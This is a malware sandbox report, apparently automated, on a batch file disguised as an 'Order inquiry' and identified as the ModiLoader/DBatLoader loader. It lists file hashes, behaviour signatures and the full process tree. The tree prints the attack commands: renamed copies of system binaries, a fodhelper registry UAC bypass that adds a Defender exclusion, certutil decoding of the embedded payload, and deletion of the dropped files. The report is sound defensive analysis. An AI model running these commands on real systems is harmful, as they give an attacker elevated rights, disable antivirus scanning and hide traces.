Analysis
-
max time kernel
51s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
26/03/2024, 08:25
Static task
static1
Behavioral task
behavioral1
Sample
Order inquiry.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Order inquiry.bat
Resource
win10-20240221-en
General
-
Target
Order inquiry.bat
-
Size
3.1MB
-
MD5
77266339f26515585f6996c37e3e7122
-
SHA1
912e68d372a859015ee5e68e6f01348add0da395
-
SHA256
4076e46f0972df38325a55a539cdddbd7f9d87b5ffd22cdf53c8187747609cda
-
SHA512
268022315681c97be24af272fed1c5871e6bb4920b6009ed1df2a37c95cf68991b193d544eaa71412a009cbfa70948b0f57f7eac5619548c469b7a78403f82b7
-
SSDEEP
24576:ywyJPcV/Hrrz6jT6vaQrAAAy4QE1FpVJQQul6kE82zg38H6HKpLJrvvfzrEZnfQs:JyJPcVHQNQrAAHEPJQT7Z38dEhg3xfO
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/2944-59-0x0000000003160000-0x0000000004160000-memory.dmp modiloader_stage2 -
Executes dropped EXE 16 IoCs
pid Process 2976 alpha.exe 3008 alpha.exe 2592 alpha.exe 2644 xkn.exe 2708 alpha.exe 2808 alpha.exe 2476 kn.exe 2616 alpha.exe 2692 kn.exe 2944 Lewxa.com 2020 alpha.exe 320 alpha.exe 1520 alpha.exe 2812 alpha.exe 2732 alpha.exe 1924 alpha.exe -
Loads dropped DLL 13 IoCs
pid Process 2064 cmd.exe 2064 cmd.exe 2064 cmd.exe 2592 alpha.exe 2644 xkn.exe 2644 xkn.exe 2644 xkn.exe 2064 cmd.exe 2808 alpha.exe 2064 cmd.exe 2616 alpha.exe 2780 WerFault.exe 2780 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2780 2944 WerFault.exe 43 -
Kills process with taskkill 2 IoCs
pid Process 1968 taskkill.exe 2508 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2848 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2944 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2644 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2644 xkn.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2064 wrote to memory of 2912 2064 cmd.exe 29 PID 2064 wrote to memory of 2912 2064 cmd.exe 29 PID 2064 wrote to memory of 2912 2064 cmd.exe 29 PID 2912 wrote to memory of 2916 2912 cmd.exe 30 PID 2912 wrote to memory of 2916 2912 cmd.exe 30 PID 2912 wrote to memory of 2916 2912 cmd.exe 30 PID 2064 wrote to memory of 2976 2064 cmd.exe 31 PID 2064 wrote to memory of 2976 2064 cmd.exe 31 PID 2064 wrote to memory of 2976 2064 cmd.exe 31 PID 2976 wrote to memory of 1704 2976 alpha.exe 32 PID 2976 wrote to memory of 1704 2976 alpha.exe 32 PID 2976 wrote to memory of 1704 2976 alpha.exe 32 PID 2064 wrote to memory of 3008 2064 cmd.exe 33 PID 2064 wrote to memory of 3008 2064 cmd.exe 33 PID 2064 wrote to memory of 3008 2064 cmd.exe 33 PID 3008 wrote to memory of 2540 3008 alpha.exe 34 PID 3008 wrote to memory of 2540 3008 alpha.exe 34 PID 3008 wrote to memory of 2540 3008 alpha.exe 34 PID 2064 wrote to memory of 2592 2064 cmd.exe 35 PID 2064 wrote to memory of 2592 2064 cmd.exe 35 PID 2064 wrote to memory of 2592 2064 cmd.exe 35 PID 2592 wrote to memory of 2644 2592 alpha.exe 36 PID 2592 wrote to memory of 2644 2592 alpha.exe 36 PID 2592 wrote to memory of 2644 2592 alpha.exe 36 PID 2644 wrote to memory of 2708 2644 xkn.exe 37 PID 2644 wrote to memory of 2708 2644 xkn.exe 37 PID 2644 wrote to memory of 2708 2644 xkn.exe 37 PID 2708 wrote to memory of 2848 2708 alpha.exe 38 PID 2708 wrote to memory of 2848 2708 alpha.exe 38 PID 2708 wrote to memory of 2848 2708 alpha.exe 38 PID 2064 wrote to memory of 2808 2064 cmd.exe 39 PID 2064 wrote to memory of 2808 2064 cmd.exe 39 PID 2064 wrote to memory of 2808 2064 cmd.exe 39 PID 2808 wrote to memory of 2476 2808 alpha.exe 40 PID 2808 wrote to memory of 2476 2808 alpha.exe 40 PID 2808 wrote to memory of 2476 2808 alpha.exe 40 PID 2064 wrote to memory of 2616 2064 cmd.exe 41 PID 2064 wrote to memory of 2616 2064 cmd.exe 41 PID 2064 wrote to memory of 2616 2064 cmd.exe 41 PID 2616 wrote to memory of 2692 2616 alpha.exe 42 PID 2616 wrote to memory of 2692 2616 alpha.exe 42 PID 2616 wrote to memory of 2692 2616 alpha.exe 42 PID 2064 wrote to memory of 2944 2064 cmd.exe 43 PID 2064 wrote to memory of 2944 2064 cmd.exe 43 PID 2064 wrote to memory of 2944 2064 cmd.exe 43 PID 2064 wrote to memory of 2944 2064 cmd.exe 43 PID 2064 wrote to memory of 2020 2064 cmd.exe 44 PID 2064 wrote to memory of 2020 2064 cmd.exe 44 PID 2064 wrote to memory of 2020 2064 cmd.exe 44 PID 2064 wrote to memory of 320 2064 cmd.exe 45 PID 2064 wrote to memory of 320 2064 cmd.exe 45 PID 2064 wrote to memory of 320 2064 cmd.exe 45 PID 2064 wrote to memory of 1520 2064 cmd.exe 46 PID 2064 wrote to memory of 1520 2064 cmd.exe 46 PID 2064 wrote to memory of 1520 2064 cmd.exe 46 PID 2064 wrote to memory of 2812 2064 cmd.exe 47 PID 2064 wrote to memory of 2812 2064 cmd.exe 47 PID 2064 wrote to memory of 2812 2064 cmd.exe 47 PID 2064 wrote to memory of 2732 2064 cmd.exe 48 PID 2064 wrote to memory of 2732 2064 cmd.exe 48 PID 2064 wrote to memory of 2732 2064 cmd.exe 48 PID 2732 wrote to memory of 1968 2732 alpha.exe 49 PID 2732 wrote to memory of 1968 2732 alpha.exe 49 PID 2732 wrote to memory of 1968 2732 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:2916
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:1704
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2540
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:2848
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2692
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 7163⤵
- Loads dropped DLL
- Program crash
PID:2780
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2020
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:320
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1520
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2812
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:1924 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD55e3260366c3c643511ba9d5f0bffefd4
SHA1ef84ae0ed0a835dda0c8ebab1c166e95e8da1403
SHA25641d8ce140db1ab125f33ac3e8603d01fd85191b37b41314808cb29e069dd4243
SHA51246e1a3f630e0710bb182a0d9cc1876d7df725c818342def0ed1a657cc6b79b9c996ae483d09357344234d725a10c4af037e67ece32293b63fcb4bf7c932acfc7
-
Filesize
1.1MB
MD5aa6d1a831ba292e2670da589b8aea980
SHA1fe61d016a11a1ea9b85bec7139d44b1acbb6bfcd
SHA256f5cd840346c9d16181109ba81cd4206e46f87682799b54eaa0f3cb4689a7d05d
SHA512d0eaa2933b75d9114714ecf6c0f04b1bc4396ee570759bc3d7bfca7426f039d0234ffc6791de66332ce5682dfbc5a6daa1fbb252b68e67c65362e42a5a295c08
-
Filesize
303KB
MD5715f276b8045bc0e5510b4d60cde68b5
SHA1e4878dcb8da163ab85c17d567deda1f1772cdf97
SHA256ab27d8cbf064962aa4016bbbcd21b51c1b90b1c4b1f9c2ee1d6a274c9dff1368
SHA512676f8484008356a071b467ac0a3f6f627244ec2c09506ebcd2433131ac8d5438195810cdca664d7f39d34abf7de18a549909b38db8b40414706976de1e748b2f
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d